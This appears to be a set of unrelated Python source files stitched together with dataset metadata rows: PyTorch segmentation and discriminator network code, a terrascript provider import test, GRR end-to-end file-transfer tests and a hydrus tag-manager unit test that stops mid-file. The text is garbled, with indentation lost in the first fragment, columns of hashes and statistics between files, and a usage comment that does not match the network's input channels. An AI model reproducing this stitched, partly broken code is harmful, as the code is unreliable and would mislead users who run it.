donv5b = F.relu(self.donv5b(unpool5), inplace = True)
donv5a = F.relu(self.donv5a(donv5b), inplace = True)
unpool4 = torch.cat([self.unpool4(donv5a, idxs4), conv4b], 1)
donv4b = F.relu(self.donv4b(unpool4), inplace = True)
donv4a = F.relu(self.donv4a(donv4b), inplace = True)
unpool3 = torch.cat([self.unpool3(donv4a, idxs3), conv3b], 1)
donv3b = F.relu(self.donv3b(unpool3), inplace = True)
donv3a = F.relu(self.donv3a(donv3b))
unpool2 = torch.cat([self.unpool2(donv3a, idxs2), conv2], 1)
donv2 = F.relu(self.donv2(unpool2), inplace = True)
unpool1 = torch.cat([self.unpool1(donv2, idxs1), conv1], 1)
donv1 = F.relu(self.donv1(unpool1), inplace = True)
output = self.output(donv1)
return torch.sigmoid(output)
class SUMNet(nn.Module):
def __init__(self):
super(SUMNet, self).__init__()
self.conv1 = nn.Conv2d(16, 64, 3, padding=(1,1))
self.bn1 = nn.BatchNorm2d(64)
        self.pool1 = nn.MaxPool2d(2, 2, return_indices = True)  # indices are needed by MaxUnpool2d in forward
self.conv2 = nn.Conv2d(64, 128, 3, padding=(1,1))
self.bn2 = nn.BatchNorm2d(128)
        self.pool2 = nn.MaxPool2d(2, 2, return_indices = True)
self.conv3a = nn.Conv2d(128, 256, 3, padding=(1,1))
self.bn3 = nn.BatchNorm2d(256)
self.conv3b = nn.Conv2d(256, 256, 3, padding=(1,1))
self.bn4 = nn.BatchNorm2d(256)
        self.pool3 = nn.MaxPool2d(2, 2, return_indices = True)
self.conv4a = nn.Conv2d(256, 512, 3, padding=(1,1))
self.bn5 = nn.BatchNorm2d(512)
self.conv4b = nn.Conv2d(512, 512, 3, padding=(1,1))
self.bn6 = nn.BatchNorm2d(512)
        self.pool4 = nn.MaxPool2d(2, 2, return_indices = True)
self.conv5a = nn.Conv2d(512, 512, 3, padding=(1,1))
self.bn7 = nn.BatchNorm2d(512)
self.conv5b = nn.Conv2d(512, 512, 3, padding=(1,1))
self.bn8 = nn.BatchNorm2d(512)
        self.pool5 = nn.MaxPool2d(2, 2, return_indices = True)
self.unpool5 = nn.MaxUnpool2d(2, 2)
self.donv5b = nn.Conv2d(1024, 512, 3, padding = 1)
self.donv5a = nn.Conv2d(512, 512, 3, padding = 1)
self.unpool4 = nn.MaxUnpool2d(2, 2)
self.donv4b = nn.Conv2d(1024, 512, 3, padding = 1)
self.donv4a = nn.Conv2d(512, 256, 3, padding = 1)
self.unpool3 = nn.MaxUnpool2d(2, 2)
self.donv3b = nn.Conv2d(512, 256, 3, padding = 1)
self.donv3a = nn.Conv2d(256,128, 3, padding = 1)
self.unpool2 = nn.MaxUnpool2d(2, 2)
self.donv2 = nn.Conv2d(256, 64, 3, padding = 1)
self.unpool1 = nn.MaxUnpool2d(2, 2)
self.donv1 = nn.Conv2d(128, 32, 3, padding = 1)
self.output = nn.Conv2d(32, 4, 1)
def forward(self, x):
conv1 = F.relu(self.bn1(self.conv1(x)), inplace = True)
pool1, idxs1 = self.pool1(conv1)
conv2 = F.relu(self.bn2(self.conv2(pool1)), inplace = True)
pool2, idxs2 = self.pool2(conv2)
conv3a = F.relu(self.bn3(self.conv3a(pool2)), inplace = True)
conv3b = F.relu(self.bn4(self.conv3b(conv3a)), inplace = True)
pool3, idxs3 = self.pool3(conv3b)
conv4a = F.relu(self.bn5(self.conv4a(pool3)), inplace = True)
conv4b = F.relu(self.bn6(self.conv4b(conv4a)), inplace = True)
pool4, idxs4 = self.pool4(conv4b)
conv5a = F.relu(self.bn7(self.conv5a(pool4)), inplace = True)
conv5b = F.relu(self.bn8(self.conv5b(conv5a)), inplace = True)
pool5, idxs5 = self.pool5(conv5b)
unpool5 = torch.cat([self.unpool5(pool5, idxs5), conv5b], 1)
donv5b = F.relu(self.donv5b(unpool5), inplace = True)
donv5a = F.relu(self.donv5a(donv5b), inplace = True)
unpool4 = torch.cat([self.unpool4(donv5a, idxs4), conv4b], 1)
donv4b = F.relu(self.donv4b(unpool4), inplace = True)
donv4a = F.relu(self.donv4a(donv4b), inplace = True)
unpool3 = torch.cat([self.unpool3(donv4a, idxs3), conv3b], 1)
donv3b = F.relu(self.donv3b(unpool3), inplace = True)
donv3a = F.relu(self.donv3a(donv3b))
unpool2 = torch.cat([self.unpool2(donv3a, idxs2), conv2], 1)
donv2 = F.relu(self.donv2(unpool2), inplace = True)
unpool1 = torch.cat([self.unpool1(donv2, idxs1), conv1], 1)
donv1 = F.relu(self.donv1(unpool1), inplace = True)
output = self.output(donv1)
return torch.sigmoid(output)
class Discriminator(nn.Module):
def __init__(self):
super(Discriminator,self).__init__()
self.conv1 = nn.Conv2d(2, 16, 4, 2, 1, bias=False)
self.act1 = nn.LeakyReLU(0.2, inplace=False)
self.conv2 = nn.Conv2d(16, 32, 4, 2, 1, bias=False)
self.act2 = nn.LeakyReLU(0.2, inplace=False)
self.conv3 = nn.Conv2d(32, 64, 4, 2, 1, bias=False)
self.act3 = nn.LeakyReLU(0.2, inplace=False)
self.conv4 = nn.Conv2d(64, 128, 4, 2, 1, bias=False)
self.act4 = nn.LeakyReLU(0.2, inplace=False)
self.conv5 = nn.Conv2d(128, 128, 4, 2, 1, bias=False)
self.act5 = nn.LeakyReLU(0.2, inplace=False)
self.conv6 = nn.Conv2d(128, 128, 4,2,1, bias=False)
self.act6 = nn.LeakyReLU(0.2, inplace=False)
self.conv7 = nn.Conv2d(128, 2, 3, 1, bias=False)
self.pool7 = nn.MaxPool2d(2,stride=2)
def forward(self, labels):
conv1 = self.act1(self.conv1(labels))
conv2 = self.act2(self.conv2(conv1))
conv3 = self.act3(self.conv3(conv2))
conv4 = self.act4(self.conv4(conv3))
conv5 = self.act5(self.conv5(conv4))
conv6 = self.act6(self.conv6(conv5))
conv7 = self.conv7(conv6)
pool7 = self.pool7(conv7)
return torch.sigmoid(pool7)
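# A minimal shape check (a sketch, not part of the original module; the 256x256
# input size is an assumption -- any spatial size divisible by 32 fits the five
# stride-2 poolings):
#   net = SUMNet_v1()
#   out = net(torch.randn(1, 4, 256, 256))
#   assert out.shape == (1, 4, 256, 256)  # sigmoid map at the input resolution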
| 51.505263
| 78
| 0.557531
| 1,293
| 9,786
| 4.186388
| 0.07966
| 0.063551
| 0.056531
| 0.043229
| 0.913541
| 0.913541
| 0.892666
| 0.861999
| 0.849806
| 0.849806
| 0
| 0.124909
| 0.300531
| 9,786
| 189
| 79
| 51.777778
| 0.665888
| 0
| 0
| 0.806818
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.045455
| false
| 0
| 0.022727
| 0
| 0.113636
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
9641bf1f38b0a6af53ba536dc84fa8c30eb6a0cc
| 732
|
py
|
Python
|
tests/test_provider_cloudknox_cloudknox.py
|
mjuenema/python-terrascript
|
6d8bb0273a14bfeb8ff8e950fe36f97f7c6e7b1d
|
[
"BSD-2-Clause"
] | 507
|
2017-07-26T02:58:38.000Z
|
2022-01-21T12:35:13.000Z
|
tests/test_provider_cloudknox_cloudknox.py
|
mjuenema/python-terrascript
|
6d8bb0273a14bfeb8ff8e950fe36f97f7c6e7b1d
|
[
"BSD-2-Clause"
] | 135
|
2017-07-20T12:01:59.000Z
|
2021-10-04T22:25:40.000Z
|
tests/test_provider_cloudknox_cloudknox.py
|
mjuenema/python-terrascript
|
6d8bb0273a14bfeb8ff8e950fe36f97f7c6e7b1d
|
[
"BSD-2-Clause"
] | 81
|
2018-02-20T17:55:28.000Z
|
2022-01-31T07:08:40.000Z
|
# tests/test_provider_cloudknox_cloudknox.py
# Automatically generated by tools/makecode.py (24-Sep-2021 15:14:14 UTC)
def test_provider_import():
import terrascript.provider.cloudknox.cloudknox
def test_datasource_import():
from terrascript.data.cloudknox.cloudknox import cloudknox_role_policy
# TODO: Shortcut imports without namespace for official and supported providers.
# TODO: This has to be moved into a required_providers block.
# def test_version_source():
#
# import terrascript.provider.cloudknox.cloudknox
#
# t = terrascript.provider.cloudknox.cloudknox.cloudknox()
# s = str(t)
#
# assert 'https://github.com/cloudknox/terraform-provider-cloudknox' in s
# assert '0.6.0' in s
| 29.28
| 80
| 0.756831
| 96
| 732
| 5.645833
| 0.583333
| 0.199262
| 0.191882
| 0.204797
| 0.158672
| 0
| 0
| 0
| 0
| 0
| 0
| 0.024077
| 0.148907
| 732
| 24
| 81
| 30.5
| 0.845907
| 0.70082
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0.041667
| 0
| 1
| 0.5
| true
| 0
| 1
| 0
| 1.5
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
9658dbb05f5a461f21df7919c3a62bc3162b3133
| 3,524
|
py
|
Python
|
grr/test/grr_response_test/end_to_end_tests/tests/transfer.py
|
tsehori/grr
|
048506f22f74642bfe61749069a45ddf496fdab3
|
[
"Apache-2.0"
] | 1
|
2021-07-24T17:22:50.000Z
|
2021-07-24T17:22:50.000Z
|
grr/test/grr_response_test/end_to_end_tests/tests/transfer.py
|
tsehori/grr
|
048506f22f74642bfe61749069a45ddf496fdab3
|
[
"Apache-2.0"
] | 44
|
2021-05-14T22:49:24.000Z
|
2022-03-13T21:54:02.000Z
|
grr/test/grr_response_test/end_to_end_tests/tests/transfer.py
|
tsehori/grr
|
048506f22f74642bfe61749069a45ddf496fdab3
|
[
"Apache-2.0"
] | 2
|
2022-02-25T08:34:51.000Z
|
2022-03-16T17:29:44.000Z
|
#!/usr/bin/env python
"""End to end tests for transfer flows."""
from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
from grr_response_test.end_to_end_tests import test_base
class TestTransferLinux(test_base.AbstractFileTransferTest):
"""Test GetFile on Linux."""
platforms = [test_base.EndToEndTest.Platform.LINUX]
def testGetFileOS(self):
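    # Build GetFile flow args for /bin/ls over the OS pathtype, wait for the file
    # to appear in the client's VFS at fs/os/bin/ls, then verify the ELF magic.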
args = self.grr_api.types.CreateFlowArgs("GetFile")
args.pathspec.path = "/bin/ls"
args.pathspec.pathtype = args.pathspec.OS
path = "fs/os/bin/ls"
with self.WaitForFileCollection(path):
self.RunFlowAndWait("GetFile", args=args)
self.CheckELFMagic(path)
def testGetFileTSK(self):
if self.os_release == "CentOS Linux":
self.skipTest(
"TSK is not supported on CentOS due to an xfs root filesystem.")
args = self.grr_api.types.CreateFlowArgs("GetFile")
args.pathspec.path = "/usr/bin/diff"
args.pathspec.pathtype = args.pathspec.TSK
f = self.RunFlowAndWait("GetFile", args=args)
results = list(f.ListResults())
self.assertNotEmpty(results)
stat_entry = results[0].payload
path = self.TSKPathspecToVFSPath(stat_entry.pathspec)
# Run GetFile again to make sure the path gets updated.
with self.WaitForFileRefresh(path):
self.RunFlowAndWait("GetFile", args=args)
self.CheckELFMagic(path)
class TestTransferDarwin(test_base.AbstractFileTransferTest):
"""Test GetFile on Darwin."""
platforms = [test_base.EndToEndTest.Platform.DARWIN]
def testGetFileOS(self):
args = self.grr_api.types.CreateFlowArgs("GetFile")
args.pathspec.path = "/bin/ls"
args.pathspec.pathtype = args.pathspec.OS
path = "fs/os/bin/ls"
with self.WaitForFileCollection(path):
self.RunFlowAndWait("GetFile", args=args)
self.CheckMacMagic(path)
class TestTransferWindows(test_base.AbstractFileTransferTest):
"""Test GetFile on Windows."""
platforms = [test_base.EndToEndTest.Platform.WINDOWS]
def testGetFileOS(self):
args = self.grr_api.types.CreateFlowArgs("GetFile")
args.pathspec.path = "C:\\Windows\\regedit.exe"
args.pathspec.pathtype = args.pathspec.OS
path = "fs/os/C:/Windows/regedit.exe"
with self.WaitForFileCollection(path):
self.RunFlowAndWait("GetFile", args=args)
self.CheckPEMagic(path)
def testGetFileTSK(self):
args = self.grr_api.types.CreateFlowArgs("GetFile")
args.pathspec.path = "C:\\Windows\\regedit.exe"
args.pathspec.pathtype = args.pathspec.TSK
f = self.RunFlowAndWait("GetFile", args=args)
results = list(f.ListResults())
self.assertNotEmpty(results)
stat_entry = results[0].payload
path = self.TSKPathspecToVFSPath(stat_entry.pathspec)
# Run GetFile again to make sure the path gets updated.
with self.WaitForFileRefresh(path):
self.RunFlowAndWait("GetFile", args=args)
self.CheckPEMagic(path)
def testGetFileNTFS(self):
args = self.grr_api.types.CreateFlowArgs("GetFile")
args.pathspec.path = "C:\\Windows\\regedit.exe"
args.pathspec.pathtype = args.pathspec.NTFS
f = self.RunFlowAndWait("GetFile", args=args)
results = list(f.ListResults())
self.assertNotEmpty(results)
stat_entry = results[0].payload
path = self.NTFSPathspecToVFSPath(stat_entry.pathspec)
# Run GetFile again to make sure the path gets updated.
with self.WaitForFileRefresh(path):
self.RunFlowAndWait("GetFile", args=args)
self.CheckPEMagic(path)
| 30.119658
| 74
| 0.720488
| 425
| 3,524
| 5.882353
| 0.216471
| 0.0864
| 0.09
| 0.1044
| 0.8052
| 0.7608
| 0.7068
| 0.7068
| 0.7068
| 0.6892
| 0
| 0.001015
| 0.161464
| 3,524
| 116
| 75
| 30.37931
| 0.845008
| 0.082577
| 0
| 0.739726
| 0
| 0
| 0.102524
| 0.031162
| 0
| 0
| 0
| 0
| 0.041096
| 1
| 0.082192
| false
| 0
| 0.054795
| 0
| 0.219178
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
96627edf5185a45caf15d2e0b3c082b3399168fb
| 136,559
|
py
|
Python
|
hydrus/test/TestClientTags.py
|
Asday/hydrus
|
a09ab839633661f446612a92b680bb8118a46b39
|
[
"WTFPL"
] | null | null | null |
hydrus/test/TestClientTags.py
|
Asday/hydrus
|
a09ab839633661f446612a92b680bb8118a46b39
|
[
"WTFPL"
] | null | null | null |
hydrus/test/TestClientTags.py
|
Asday/hydrus
|
a09ab839633661f446612a92b680bb8118a46b39
|
[
"WTFPL"
] | null | null | null |
import collections
import unittest
from hydrus.core import HydrusConstants as HC
from hydrus.core import HydrusData
from hydrus.core import HydrusGlobals as HG
from hydrus.core import HydrusTags
from hydrus.core import HydrusText
from hydrus.external import SystemPredicateParser
from hydrus.client import ClientConstants as CC
from hydrus.client import ClientManagers
from hydrus.client import ClientSearch
from hydrus.client import ClientSearchParseSystemPredicates
from hydrus.client.media import ClientMediaManagers
from hydrus.client.metadata import ClientTags
from hydrus.client.metadata import ClientTagsHandling
class TestMergeTagsManagers( unittest.TestCase ):
def test_merge( self ):
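        # Each mapping is service key -> content status (current / deleted / pending /
        # petitioned) -> set of tags; three per-file TagsManagers are built from these
        # and merged, and the 'character:' namespace should survive the merge.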
first = HydrusData.GenerateKey()
second = HydrusData.GenerateKey()
third = HydrusData.GenerateKey()
#
service_keys_to_statuses_to_tags = collections.defaultdict( HydrusData.default_dict_set )
service_keys_to_statuses_to_tags[ first ][ HC.CONTENT_STATUS_CURRENT ] = { 'current_1', 'series:blame!' }
service_keys_to_statuses_to_tags[ second ][ HC.CONTENT_STATUS_CURRENT ] = { 'current_duplicate_1', 'character:cibo' }
service_keys_to_statuses_to_tags[ second ][ HC.CONTENT_STATUS_DELETED ] = { 'current_1' }
service_keys_to_statuses_to_tags[ second ][ HC.CONTENT_STATUS_PENDING ] = { 'pending_1', 'creator:tsutomu nihei' }
service_keys_to_statuses_to_tags[ second ][ HC.CONTENT_STATUS_PETITIONED ] = { 'petitioned_1' }
service_keys_to_statuses_to_tags[ third ][ HC.CONTENT_STATUS_CURRENT ] = { 'current_duplicate', 'current_duplicate_1' }
service_keys_to_statuses_to_tags[ third ][ HC.CONTENT_STATUS_PENDING ] = { 'volume:3' }
service_keys_to_statuses_to_display_tags = collections.defaultdict( HydrusData.default_dict_set )
service_keys_to_statuses_to_display_tags[ first ][ HC.CONTENT_STATUS_CURRENT ] = { 'current_1', 'series:blame!' }
service_keys_to_statuses_to_display_tags[ second ][ HC.CONTENT_STATUS_CURRENT ] = { 'current_duplicate_1', 'character:cibo' }
service_keys_to_statuses_to_display_tags[ second ][ HC.CONTENT_STATUS_PENDING ] = { 'pending_1', 'creator:tsutomu nihei' }
service_keys_to_statuses_to_display_tags[ third ][ HC.CONTENT_STATUS_CURRENT ] = { 'current_duplicate', 'current_duplicate_1' }
service_keys_to_statuses_to_display_tags[ third ][ HC.CONTENT_STATUS_PENDING ] = { 'volume:3' }
tags_manager_1 = ClientMediaManagers.TagsManager( service_keys_to_statuses_to_tags, service_keys_to_statuses_to_display_tags )
#
service_keys_to_statuses_to_tags = collections.defaultdict( HydrusData.default_dict_set )
service_keys_to_statuses_to_tags[ first ][ HC.CONTENT_STATUS_CURRENT ] = { 'current_2', 'series:blame!', 'chapter:1' }
service_keys_to_statuses_to_tags[ first ][ HC.CONTENT_STATUS_DELETED ] = { 'deleted_2' }
service_keys_to_statuses_to_tags[ second ][ HC.CONTENT_STATUS_CURRENT ] = { 'current_duplicate' }
service_keys_to_statuses_to_tags[ second ][ HC.CONTENT_STATUS_PENDING ] = { 'architecture', 'chapter:2' }
service_keys_to_statuses_to_tags[ third ][ HC.CONTENT_STATUS_CURRENT ] = { 'current_duplicate' }
service_keys_to_statuses_to_display_tags = collections.defaultdict( HydrusData.default_dict_set )
service_keys_to_statuses_to_display_tags[ first ][ HC.CONTENT_STATUS_CURRENT ] = { 'current_2', 'series:blame!', 'chapter:1' }
service_keys_to_statuses_to_display_tags[ first ][ HC.CONTENT_STATUS_DELETED ] = { 'deleted_2' }
service_keys_to_statuses_to_display_tags[ second ][ HC.CONTENT_STATUS_CURRENT ] = { 'current_duplicate' }
service_keys_to_statuses_to_display_tags[ second ][ HC.CONTENT_STATUS_PENDING ] = { 'architecture', 'chapter:2' }
service_keys_to_statuses_to_display_tags[ third ][ HC.CONTENT_STATUS_CURRENT ] = { 'current_duplicate' }
tags_manager_2 = ClientMediaManagers.TagsManager( service_keys_to_statuses_to_tags, service_keys_to_statuses_to_display_tags )
#
service_keys_to_statuses_to_tags = collections.defaultdict( HydrusData.default_dict_set )
service_keys_to_statuses_to_tags[ second ][ HC.CONTENT_STATUS_CURRENT ] = { 'page:4', 'page:5' }
service_keys_to_statuses_to_tags[ second ][ HC.CONTENT_STATUS_PENDING ] = { 'title:double page spread' }
service_keys_to_statuses_to_display_tags = collections.defaultdict( HydrusData.default_dict_set )
service_keys_to_statuses_to_display_tags[ second ][ HC.CONTENT_STATUS_CURRENT ] = { 'page:4', 'page:5' }
service_keys_to_statuses_to_display_tags[ second ][ HC.CONTENT_STATUS_PENDING ] = { 'title:double page spread' }
tags_manager_3 = ClientMediaManagers.TagsManager( service_keys_to_statuses_to_tags, service_keys_to_statuses_to_display_tags )
#
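# Merge the three managers into one and check the combined 'character' namespace slice.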
tags_managers = ( tags_manager_1, tags_manager_2, tags_manager_3 )
tags_manager = ClientMediaManagers.TagsManager.MergeTagsManagers( tags_managers )
#
self.assertEqual( tags_manager.GetNamespaceSlice( ( 'character', ), ClientTags.TAG_DISPLAY_ACTUAL ), frozenset( { 'character:cibo' } ) )
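# TestTagsManager checks the status getters (current/deleted/pending/petitioned),
# content update processing and service resets against fixed service keys.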
class TestTagsManager( unittest.TestCase ):
@classmethod
def setUpClass( cls ):
cls._first_key = HydrusData.GenerateKey()
cls._second_key = HydrusData.GenerateKey()
cls._third_key = HydrusData.GenerateKey()
service_keys_to_statuses_to_tags = collections.defaultdict( HydrusData.default_dict_set )
service_keys_to_statuses_to_tags[ cls._first_key ][ HC.CONTENT_STATUS_CURRENT ] = { 'current', '\u2835', 'creator:tsutomu nihei', 'series:blame!', 'title:test title', 'volume:3', 'chapter:2', 'page:1' }
service_keys_to_statuses_to_tags[ cls._first_key ][ HC.CONTENT_STATUS_DELETED ] = { 'deleted' }
service_keys_to_statuses_to_tags[ cls._second_key ][ HC.CONTENT_STATUS_CURRENT ] = { 'deleted', '\u2835' }
service_keys_to_statuses_to_tags[ cls._second_key ][ HC.CONTENT_STATUS_DELETED ] = { 'current' }
service_keys_to_statuses_to_tags[ cls._second_key ][ HC.CONTENT_STATUS_PENDING ] = { 'pending' }
service_keys_to_statuses_to_tags[ cls._second_key ][ HC.CONTENT_STATUS_PETITIONED ] = { 'petitioned' }
service_keys_to_statuses_to_tags[ cls._third_key ][ HC.CONTENT_STATUS_CURRENT ] = { 'petitioned' }
service_keys_to_statuses_to_tags[ cls._third_key ][ HC.CONTENT_STATUS_DELETED ] = { 'pending' }
service_keys_to_statuses_to_display_tags = collections.defaultdict( HydrusData.default_dict_set )
service_keys_to_statuses_to_display_tags[ cls._first_key ][ HC.CONTENT_STATUS_CURRENT ] = { 'current', '\u2835', 'creator:tsutomu nihei', 'series:blame!', 'title:test title', 'volume:3', 'chapter:2', 'page:1' }
service_keys_to_statuses_to_display_tags[ cls._first_key ][ HC.CONTENT_STATUS_DELETED ] = { 'deleted' }
service_keys_to_statuses_to_display_tags[ cls._second_key ][ HC.CONTENT_STATUS_CURRENT ] = { 'deleted', '\u2835' }
service_keys_to_statuses_to_display_tags[ cls._second_key ][ HC.CONTENT_STATUS_PENDING ] = { 'pending' }
service_keys_to_statuses_to_display_tags[ cls._third_key ][ HC.CONTENT_STATUS_CURRENT ] = { 'petitioned' }
service_keys_to_statuses_to_display_tags[ cls._third_key ][ HC.CONTENT_STATUS_DELETED ] = { 'pending' }
cls._tags_manager = ClientMediaManagers.TagsManager( service_keys_to_statuses_to_tags, service_keys_to_statuses_to_display_tags )
cls._service_keys_to_statuses_to_tags = service_keys_to_statuses_to_tags
#
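# A second manager with three extra services backs the mutation tests below:
# delete-pending, content update processing and a full service reset.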
cls._pending_service_key = HydrusData.GenerateKey()
cls._content_update_service_key = HydrusData.GenerateKey()
cls._reset_service_key = HydrusData.GenerateKey()
other_service_keys_to_statuses_to_tags = collections.defaultdict( HydrusData.default_dict_set )
other_service_keys_to_statuses_to_tags[ cls._pending_service_key ][ HC.CONTENT_STATUS_PENDING ] = { 'pending' }
other_service_keys_to_statuses_to_tags[ cls._pending_service_key ][ HC.CONTENT_STATUS_PETITIONED ] = { 'petitioned' }
other_service_keys_to_statuses_to_tags[ cls._reset_service_key ][ HC.CONTENT_STATUS_CURRENT ] = { 'reset_current' }
other_service_keys_to_statuses_to_tags[ cls._reset_service_key ][ HC.CONTENT_STATUS_DELETED ] = { 'reset_deleted' }
other_service_keys_to_statuses_to_tags[ cls._reset_service_key ][ HC.CONTENT_STATUS_PENDING ] = { 'reset_pending' }
other_service_keys_to_statuses_to_tags[ cls._reset_service_key ][ HC.CONTENT_STATUS_PETITIONED ] = { 'reset_petitioned' }
other_service_keys_to_statuses_to_display_tags = collections.defaultdict( HydrusData.default_dict_set )
other_service_keys_to_statuses_to_display_tags[ cls._pending_service_key ][ HC.CONTENT_STATUS_PENDING ] = { 'pending' }
other_service_keys_to_statuses_to_display_tags[ cls._reset_service_key ][ HC.CONTENT_STATUS_CURRENT ] = { 'reset_current' }
other_service_keys_to_statuses_to_display_tags[ cls._reset_service_key ][ HC.CONTENT_STATUS_PENDING ] = { 'reset_pending' }
cls._other_tags_manager = ClientMediaManagers.TagsManager( other_service_keys_to_statuses_to_tags, other_service_keys_to_statuses_to_display_tags )
cls._other_service_keys_to_statuses_to_tags = other_service_keys_to_statuses_to_tags
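# DeletePending should clear both the pending and the petitioned tags for the service.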
def test_delete_pending( self ):
self.assertEqual( self._other_tags_manager.GetPending( self._pending_service_key, ClientTags.TAG_DISPLAY_STORAGE ), { 'pending' } )
self.assertEqual( self._other_tags_manager.GetPetitioned( self._pending_service_key, ClientTags.TAG_DISPLAY_STORAGE ), { 'petitioned' } )
self._other_tags_manager.DeletePending( self._pending_service_key )
self.assertEqual( self._other_tags_manager.GetPending( self._pending_service_key, ClientTags.TAG_DISPLAY_STORAGE ), set() )
self.assertEqual( self._other_tags_manager.GetPetitioned( self._pending_service_key, ClientTags.TAG_DISPLAY_STORAGE ), set() )
def test_get_current( self ):
self.assertEqual( self._tags_manager.GetCurrent( self._first_key, ClientTags.TAG_DISPLAY_STORAGE ), { 'current', '\u2835', 'creator:tsutomu nihei', 'series:blame!', 'title:test title', 'volume:3', 'chapter:2', 'page:1' } )
self.assertEqual( self._tags_manager.GetCurrent( self._second_key, ClientTags.TAG_DISPLAY_STORAGE ), { 'deleted', '\u2835' } )
self.assertEqual( self._tags_manager.GetCurrent( self._third_key, ClientTags.TAG_DISPLAY_STORAGE ), { 'petitioned' } )
self.assertEqual( self._tags_manager.GetCurrent( CC.COMBINED_TAG_SERVICE_KEY, ClientTags.TAG_DISPLAY_STORAGE ), { 'current', 'deleted', '\u2835', 'creator:tsutomu nihei', 'series:blame!', 'title:test title', 'volume:3', 'chapter:2', 'page:1', 'petitioned' } )
def test_get_deleted( self ):
self.assertEqual( self._tags_manager.GetDeleted( self._first_key, ClientTags.TAG_DISPLAY_STORAGE ), { 'deleted' } )
self.assertEqual( self._tags_manager.GetDeleted( self._second_key, ClientTags.TAG_DISPLAY_STORAGE ), { 'current' } )
self.assertEqual( self._tags_manager.GetDeleted( self._third_key, ClientTags.TAG_DISPLAY_STORAGE ), { 'pending' } )
self.assertEqual( self._tags_manager.GetDeleted( CC.COMBINED_TAG_SERVICE_KEY, ClientTags.TAG_DISPLAY_STORAGE ), { 'deleted', 'current', 'pending' } )
def test_get_namespace_slice( self ):
self.assertEqual( self._tags_manager.GetNamespaceSlice( ( 'creator', 'series' ), ClientTags.TAG_DISPLAY_ACTUAL ), frozenset( { 'creator:tsutomu nihei', 'series:blame!' } ) )
self.assertEqual( self._tags_manager.GetNamespaceSlice( [], ClientTags.TAG_DISPLAY_ACTUAL ), frozenset() )
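# GetNumTags honours the include_current/include_pending flags; the combined service
# counts the union of tags across services, so tags shared between services only count once.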
def test_get_num_tags( self ):
self.assertEqual( self._tags_manager.GetNumTags( ClientSearch.TagSearchContext( service_key = self._first_key, include_current_tags = False, include_pending_tags = False ), ClientTags.TAG_DISPLAY_STORAGE ), 0 )
self.assertEqual( self._tags_manager.GetNumTags( ClientSearch.TagSearchContext( service_key = self._first_key, include_current_tags = True, include_pending_tags = False ), ClientTags.TAG_DISPLAY_STORAGE ), 8 )
self.assertEqual( self._tags_manager.GetNumTags( ClientSearch.TagSearchContext( service_key = self._first_key, include_current_tags = False, include_pending_tags = True ), ClientTags.TAG_DISPLAY_STORAGE ), 0 )
self.assertEqual( self._tags_manager.GetNumTags( ClientSearch.TagSearchContext( service_key = self._first_key, include_current_tags = True, include_pending_tags = True ), ClientTags.TAG_DISPLAY_STORAGE ), 8 )
self.assertEqual( self._tags_manager.GetNumTags( ClientSearch.TagSearchContext( service_key = self._second_key, include_current_tags = False, include_pending_tags = False ), ClientTags.TAG_DISPLAY_STORAGE ), 0 )
self.assertEqual( self._tags_manager.GetNumTags( ClientSearch.TagSearchContext( service_key = self._second_key, include_current_tags = True, include_pending_tags = False ), ClientTags.TAG_DISPLAY_STORAGE ), 2 )
self.assertEqual( self._tags_manager.GetNumTags( ClientSearch.TagSearchContext( service_key = self._second_key, include_current_tags = False, include_pending_tags = True ), ClientTags.TAG_DISPLAY_STORAGE ), 1 )
self.assertEqual( self._tags_manager.GetNumTags( ClientSearch.TagSearchContext( service_key = self._second_key, include_current_tags = True, include_pending_tags = True ), ClientTags.TAG_DISPLAY_STORAGE ), 3 )
self.assertEqual( self._tags_manager.GetNumTags( ClientSearch.TagSearchContext( service_key = self._third_key, include_current_tags = False, include_pending_tags = False ), ClientTags.TAG_DISPLAY_STORAGE ), 0 )
self.assertEqual( self._tags_manager.GetNumTags( ClientSearch.TagSearchContext( service_key = self._third_key, include_current_tags = True, include_pending_tags = False ), ClientTags.TAG_DISPLAY_STORAGE ), 1 )
self.assertEqual( self._tags_manager.GetNumTags( ClientSearch.TagSearchContext( service_key = self._third_key, include_current_tags = False, include_pending_tags = True ), ClientTags.TAG_DISPLAY_STORAGE ), 0 )
self.assertEqual( self._tags_manager.GetNumTags( ClientSearch.TagSearchContext( service_key = self._third_key, include_current_tags = True, include_pending_tags = True ), ClientTags.TAG_DISPLAY_STORAGE ), 1 )
self.assertEqual( self._tags_manager.GetNumTags( ClientSearch.TagSearchContext( service_key = CC.COMBINED_TAG_SERVICE_KEY, include_current_tags = False, include_pending_tags = False ), ClientTags.TAG_DISPLAY_STORAGE ), 0 )
self.assertEqual( self._tags_manager.GetNumTags( ClientSearch.TagSearchContext( service_key = CC.COMBINED_TAG_SERVICE_KEY, include_current_tags = True, include_pending_tags = False ), ClientTags.TAG_DISPLAY_STORAGE ), 10 )
self.assertEqual( self._tags_manager.GetNumTags( ClientSearch.TagSearchContext( service_key = CC.COMBINED_TAG_SERVICE_KEY, include_current_tags = False, include_pending_tags = True ), ClientTags.TAG_DISPLAY_STORAGE ), 1 )
self.assertEqual( self._tags_manager.GetNumTags( ClientSearch.TagSearchContext( service_key = CC.COMBINED_TAG_SERVICE_KEY, include_current_tags = True, include_pending_tags = True ), ClientTags.TAG_DISPLAY_STORAGE ), 11 )
def test_get_pending( self ):
